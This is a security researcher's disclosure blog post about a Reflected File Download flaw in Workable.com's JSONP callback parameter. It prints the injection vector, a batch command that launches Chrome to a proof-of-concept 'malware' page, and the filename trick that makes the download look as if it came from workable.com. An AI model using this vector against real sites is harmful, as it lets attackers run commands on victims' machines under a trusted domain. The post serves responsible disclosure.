For those who don’t know Workable.com

Workable is affordable, usable hiring software. It replaces email and spreadsheets with an applicant tracking system that your team will actually enjoy using. From building a branded careers page, to posting ads to multiple job boards Workable makes it simple. Browse rich profiles of your candidates and work effectively with your hiring team on a platform that keeps your notes, communication, schedule, comments and analytics in one place. It’s everything you need to hire better.

I first noticed this Reflected File Download when auditing a private program at Cobalt.io.
When entering Workable.com I noticed a XHR request on my Google Inspector:
workable.com/api/accounts/8012?origin=embed which returned the following information:

[code language=”html”]
{"name":"Aesculap Healthcare","description":"","jobs":[]}
[/code]

Nothing unusual here but when I injected in the URL a “callback” parameter it reflected my injection:
workable.com/api/accounts/8012?origin=embed&callback=dsopas

[code language=”html”]
/**/dsopas({"name":"Aesculap Healthcare","description":"","jobs":[]});
[/code]

This injection gave me the opportunity to launch a RFD attack with following vector:
workable.com/api/accounts/8012?origin=embed&callback=||start chrome davidsopas.com/poc/malware.htm ||

[code language=”html”]
/**/||start chrome davidsopas.com/poc/malware.htm ||({"name":"Aesculap Healthcare","description":"","jobs":[]});
[/code]

Now that I had my RFD vector reflected on the JSON I needed the filename manipulation. Due to your URL being permissive I could simply add a extension to the filename called and got a batch file:

workable.com/api/accounts/8012.bat?origin=embed&callback=||start chrome davidsopas.com/poc/malware.htm ||

If you call the URL directly on Internet Explorer 9 and 8 you’ll get a file download prompt coming from workable.com.

On Google Chrome and Opera latest versions you need to force the download using the HTML5 download attribute.

workable_chrome_rfd

So in the proof-of-concept I sent them I was able to execute a new chrome window with a page that simulated malware.

A malicious user could:

  1. Launch a malicious campaign with the specially crafted page providing Workable enterprise accounts
  2. Victim downloads the file thinking that is from a trusted domain [workable.com]
  3. Malicious user gains control over victims machine

Workable surprised me with a gift thanking me for the responsible disclosure.
Cool guys! 🙂

Timeline:
13-11-2015 Sent the security report to Workable
23-11-2015 Workable replied back with the information that they were fixing it
26-11-2015 Issue is fixed
01-12-2015 Full disclosure

By: David SopasPosted on Categories : Categories : AdvisoriesTags:

Leave a Reply